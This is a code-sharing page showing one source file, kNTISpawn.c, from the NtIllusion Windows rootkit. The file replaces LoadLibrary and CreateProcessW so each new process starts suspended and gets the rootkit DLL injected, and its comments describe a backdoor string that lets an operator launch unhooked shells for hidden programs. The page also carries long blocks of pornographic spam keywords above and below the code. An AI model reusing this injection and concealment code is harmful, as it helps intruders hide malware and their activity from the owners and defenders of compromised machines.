亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? kntispawn.c

?? rootit uloading by benina
?? C
字號:
/******************************************************************************
  kNTISpawn.c	: Contains replacements for spawning functions
  *****************************************************************************
  Author		: Kdm (Kodmaker@syshell.org)
  WebSite		: http://www.syshell.org

  Copyright (C) 2003,2004 Kdm
  *****************************************************************************
  This file is part of NtIllusion.

  NtIllusion is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License as published by
  the Free Software Foundation; either version 2 of the License, or
  (at your option) any later version.

  NtIllusion is distributed in the hope that it will be useful,
  but WITHOUT ANY WARRANTY; without even the implied warranty of
  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  GNU General Public License for more details.

  You should have received a copy of the GNU General Public License
  along with NtIllusion; if not, write to the Free Software
  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  ******************************************************************************/

#include <windows.h>
#include "kNTISpawn.h"
#include "../../Misc/kNTILib.h"
#include "../../Misc/kNTIConfig.h"
#include "../../Engine/Injection/kInjectEng.h"
#include "../../Engine/Hijacking/kHijackEng.h"
// todo ici!
typedef int BOOL;

extern char kNTIDllPath[MAX_PATH];
extern char ExePath[1024+1];

// Pointers to non-hijacked functions
FARPROC fLoadLibrary=NULL;
FARPROC fCreateProcessW=NULL;
FARPROC fGetProcAddress=NULL;

//	o General routines o
//		LoadLibrary : prevent a process from escaping hijack by loading a new dll and calling one of its function
HINSTANCE WINAPI MyLoadLibrary( LPCTSTR lpLibFileName )
{
	HINSTANCE hInst= NULL;
	HMODULE	  hMod = NULL;
	char	 *lDll = NULL;			// dll path in lower case

	OutputString("\n[!] Run time load of DLL => '%s' (%s), patching APIs.\n", lpLibFileName, ExePath);
	
	// Check if Dll was already loaded
	hMod = GetModuleHandle(lpLibFileName);

	hInst = (HINSTANCE) fLoadLibrary(lpLibFileName);
	
	if(hInst) 
	{
		//OutputString(" OK, trying to patch APIs... \n");
		
		// If dll was already loaded, don't set hooks a second time
		if(hMod==NULL)
		{
	
			// Duplicate Dll path "winnt.h"
			lDll = _strdup( (char*)lpLibFileName );
			if(!lDll)
				goto end;
			// Convert it to lower case
			_strlwr(lDll);
			
			SetUpHooks((int)NTI_ON_NEW_DLL, (char*)lDll);
			//HijackApiOfNewModule((HMODULE)hInst, lpLibFileName, "*");
			
			free(lDll);
		}		
	}

end:
  return hInst;
}


//		Backdoor : if application name or command line contains RTK_FILE_CHAR
//		the created process is *not* hooked.
//		Useful to launch hidden process from windows gui/cmd.exe that performs
//		a search before delegating the creation of the process to CreateProcess
//		To launch a non hijacked process using cmd, do the following :
//		run:  cmd.exe
//		type: cmd.exe _nti			(where _nti is RTK_FILE_CHAR )
//		then run your hidden program from the non hijacked shell
BOOL WINAPI MyCreateProcessW(LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, 
LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
{
	int bResult, bInject=1;
	char msg[1024], cmdline[256], appname[256];

	OutputString("[i] CreateProcessW()\n");

	// do not rely on info given by HijackApi() since we may have hijacked at GetProcAddress() level

	if(!fCreateProcessW) {
		fCreateProcessW = (FARPROC) fGetProcAddress(GetModuleHandle("kernel32.dll"),"CreateProcessW");
		if(!fCreateProcessW) return 0;
	}


	my_memset(msg, 0, 1024);
	my_memset(cmdline, 0, 256);
	my_memset(appname, 0, 256);
	 //Convert strings from unicode :
	WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpApplicationName, -1, appname, 255,NULL, NULL);
	WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpCommandLine, -1, cmdline, 255,NULL, NULL);
	OutputString("\n[!!] Hooked CreateProcessW : %s - %s, injecting rootkit (%s)...\n", (char*)appname, (char*)cmdline, (char*)kNTIDllPath);
	
	bResult = (int) fCreateProcessW((const unsigned short *)lpApplicationName,
		(unsigned short *)lpCommandLine, lpProcessAttributes, lpThreadAttributes,
		bInheritHandles, CREATE_SUSPENDED /*dwCreationFlags*/, 
		lpEnvironment, (const unsigned short *)lpCurrentDirectory,	
		(struct _STARTUPINFOW *)lpStartupInfo, lpProcessInformation);
	
	// inject the created process if its name & command line doesn't contain RTK_FILE_CHAR
	if(bResult)
	{
		if(lpCommandLine) {
			if(strstr((char*)cmdline,(char*)RTK_FILE_CHAR)){
				OutputString("\n[i] CreateProcessW: Giving true sight to process '%s'...\n", (char*)appname);
				WakeUpProcess(lpProcessInformation->dwProcessId);
				bInject = 0;
			}
		}
		if(lpApplicationName) {
			if(strstr((char*)appname,(char*)RTK_FILE_CHAR)) {
				OutputString("\n[i] CreateProcessW: Giving true sight to process '%s'...\n", (char*)appname);
				WakeUpProcess(lpProcessInformation->dwProcessId);
				bInject = 0;
			}
		}
		if(bInject) InjectDll(lpProcessInformation->hProcess, (char*)kNTIDllPath);

		CloseHandle(lpProcessInformation->hProcess);
		CloseHandle(lpProcessInformation->hThread); 
		
	}
	return bResult;
}

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
国产一区二区三区精品欧美日韩一区二区三区 | 日韩高清不卡一区二区| 欧美激情在线一区二区三区| 日韩欧美一级精品久久| 欧美一区午夜视频在线观看| 欧美一区三区二区| 91精品国产美女浴室洗澡无遮挡| 在线不卡一区二区| 欧美一区二区三区电影| 91精品国产麻豆| 日韩精品综合一本久道在线视频| 2021中文字幕一区亚洲| 国产欧美精品一区| 亚洲色图视频免费播放| 亚洲一区二区三区免费视频| 天天影视网天天综合色在线播放| 日韩avvvv在线播放| 蜜臀av一区二区在线免费观看| 蜜桃视频第一区免费观看| 久久精品国产77777蜜臀| 久久99这里只有精品| 国产寡妇亲子伦一区二区| 99re亚洲国产精品| 欧美影院一区二区三区| 日韩免费一区二区三区在线播放| 国产日本一区二区| 欧美精品一区视频| 国产精品不卡一区二区三区| 亚洲综合区在线| 狠狠色综合色综合网络| 一本久久a久久精品亚洲| 91精品国产一区二区三区香蕉 | aaa亚洲精品| 欧美最新大片在线看| 精品美女被调教视频大全网站| 久久精品免视看| 亚洲午夜激情网页| 国产成人免费av在线| 91亚洲精品一区二区乱码| 欧美人牲a欧美精品| 最近日韩中文字幕| 国产麻豆日韩欧美久久| 欧美四级电影在线观看| 国产蜜臀av在线一区二区三区| 亚洲高清在线视频| 91农村精品一区二区在线| 日韩欧美高清在线| 亚洲国产视频在线| 91麻豆国产福利在线观看| 精品少妇一区二区三区免费观看 | 26uuu久久天堂性欧美| 亚洲欧美日韩久久| 国产成人午夜精品5599| 欧美精品在线一区二区| 亚洲精品午夜久久久| 成人午夜又粗又硬又大| 精品国产99国产精品| 亚洲福利视频三区| 在线观看av不卡| 亚洲欧洲日产国码二区| 成人激情动漫在线观看| 欧美精品一区二区三区视频| 日韩电影在线免费观看| 欧美在线视频不卡| 一区二区成人在线视频| 91亚洲国产成人精品一区二区三 | 成人av资源下载| 日本一区二区三区免费乱视频| 久久99国产乱子伦精品免费| 欧美一级在线观看| 日本sm残虐另类| 91麻豆精品国产自产在线观看一区| 亚洲欧美日韩一区二区| 色综合天天性综合| 一区二区三区四区五区视频在线观看| 成人av小说网| 国产精品超碰97尤物18| 91免费观看视频| 亚洲最快最全在线视频| 欧美日韩国产影片| 日本成人在线看| 欧美电视剧在线观看完整版| 蜜桃av一区二区三区电影| 日韩精品一区二区三区视频在线观看| 久久国产人妖系列| 久久久www成人免费毛片麻豆| 国产精品影视网| 亚洲欧美影音先锋| 在线视频国内自拍亚洲视频| 日韩高清在线一区| 久久综合九色欧美综合狠狠| 国产91精品一区二区麻豆网站| 中文字幕一区在线观看视频| 欧美私人免费视频| 美国三级日本三级久久99| 久久久久99精品一区| youjizz国产精品| 亚洲国产成人av网| 精品美女一区二区| 色哟哟国产精品| 日本成人在线不卡视频| 国产日韩在线不卡| 欧美影院午夜播放| 国产激情视频一区二区三区欧美| 亚洲男同性视频| 91精品福利在线一区二区三区| 国产suv精品一区二区三区| 亚洲免费av观看| 精品美女被调教视频大全网站| aaa欧美日韩| 日本va欧美va瓶| 亚洲品质自拍视频网站| 精品久久久久一区二区国产| 91丝袜美女网| 狠狠狠色丁香婷婷综合久久五月| 亚洲免费观看在线观看| 精品国产一区二区亚洲人成毛片 | 色素色在线综合| 美女脱光内衣内裤视频久久影院| 欧美国产一区二区在线观看| 欧美日韩国产综合草草| 99re免费视频精品全部| 麻豆精品视频在线观看免费 | 精品少妇一区二区三区在线播放 | 国产99久久久国产精品潘金网站| 亚洲一区二区三区四区不卡| 久久久久久9999| 欧美另类videos死尸| 99精品视频一区二区| 国产成人精品影视| 麻豆精品在线看| 日韩制服丝袜av| 亚洲综合在线第一页| 最新国产成人在线观看| 中文字幕免费一区| 久久婷婷国产综合国色天香 | 国产精品久久久久9999吃药| 精品精品国产高清a毛片牛牛| 欧美日韩高清一区二区不卡| 在线亚洲高清视频| 91浏览器在线视频| 丁香婷婷深情五月亚洲| 国产精品一区二区三区乱码| 久久99久久精品| 美女尤物国产一区| 久久精品国产免费| 另类综合日韩欧美亚洲| 男男视频亚洲欧美| 人人精品人人爱| 久久成人麻豆午夜电影| 日韩高清不卡在线| 美女诱惑一区二区| 国内精品国产成人国产三级粉色| 蜜臂av日日欢夜夜爽一区| 亚洲国产成人porn| 日韩国产一二三区| 精品在线你懂的| 国产精品中文有码| eeuss鲁片一区二区三区| 成人黄色国产精品网站大全在线免费观看 | 日韩高清一区二区| 日韩高清不卡一区二区| 另类小说视频一区二区| 美女在线一区二区| 国产精品99久久久久久似苏梦涵| 激情另类小说区图片区视频区| 久久精品免费看| 国产精品一二三四五| 成人高清视频在线| 欧美主播一区二区三区美女| 欧美另类videos死尸| 久久午夜国产精品| 亚洲欧美日韩久久精品| 亚洲va韩国va欧美va| 国产一区不卡精品| 91尤物视频在线观看| 欧美卡1卡2卡| 2017欧美狠狠色| 亚洲欧洲中文日韩久久av乱码| 午夜视频在线观看一区| 韩国毛片一区二区三区| 不卡的电视剧免费网站有什么| 欧美亚洲一区二区在线| 精品国产91洋老外米糕| 亚洲乱码中文字幕综合| 日本最新不卡在线| 成人精品免费视频| 欧美日韩黄色一区二区| 久久精品日产第一区二区三区高清版| 亚洲欧美在线高清| 久久国产精品一区二区| 91在线小视频| 精品国产91洋老外米糕| 亚洲一区二区三区视频在线播放| 久久成人18免费观看| 欧美性一二三区| 国产精品亲子乱子伦xxxx裸| 五月综合激情婷婷六月色窝| 99久久综合狠狠综合久久| 日韩午夜精品电影|